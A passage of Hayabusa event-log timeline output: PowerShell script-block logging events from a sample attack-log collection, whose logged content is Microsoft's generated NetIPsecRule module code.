'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 
'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery',",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecRule' -Alias '*' function Set-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] 
[ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] 
[Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecIn')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, 
[Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${User}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Machine}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, 
[Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, 
$true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = 
${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'En",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } 
$__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecRule' -Alias '*' function Set-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecIn')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, 
[Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowSetKey}, 
[Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${User}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] 
[Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Machine}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] 
